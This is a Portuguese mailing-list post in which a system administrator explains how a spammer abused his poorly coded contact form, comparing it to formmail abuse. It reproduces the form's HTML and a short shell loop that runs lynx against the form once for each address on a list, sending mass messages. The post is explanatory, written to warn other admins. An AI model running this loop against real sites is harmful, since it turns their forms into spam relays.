Tavez não seja importante para quem é um administrador de um sistema grande, mas para quem tem uma pequena maquina com um site só e demora a ver os maildelivered, seja uma boa explicação.
Uma explicação rápida de como o cara aproveitou do codigo mal escrito que estava na minha página de formulário. Isto também ocorre com o CGI formmail. O cara clicka com botão da direita na página e cata todas as variáveis, então ele faz um script para colocar isto em loop e trocar o conteúdo das variáveis que ele quer. Veja no exemplo abaixo com um view do código da página-exemplo que vai ser atacada. <html> <head> </head> <body> <form action=FORM.php method=post> <p>Nome: <input type='text' NOME='nome'><br> Fone: <input type='text' name='FONE'><br> Email: <input type='text' name='EMAIL'><br> Mensagem: <input type='text area' name=MENSAGEM><br> <input type=submit value=Enviar name=submit> </p> </form> </body> </html> texto='um monte de [EMAIL PROTECTED] ' Exemplo de um código!! for E in `cat /home/FDP/lista-email.txt` do lynx http://www.site.com.br/FORM.php?NOME=Estefanio&FONE=3333-3333&EMAIL=$E&MENSAGEM=$texto done falta alguns paramentos no lynx mas acho que já deu para entender Estefânio Brunhara San Giovanne Informática Ltda. Soluções e integrações Linux/Windows/Novell/Cisco (31)3375-1202 --------------------------------------------------------------------------- Esta lista é patrocinada pela Conectiva S.A. Visite http://www.conectiva.com.br Arquivo: http://bazar2.conectiva.com.br/mailman/listinfo/linux-br Regras de utilização da lista: http://linux-br.conectiva.com.br FAQ: http://www.zago.eti.br/menu.html
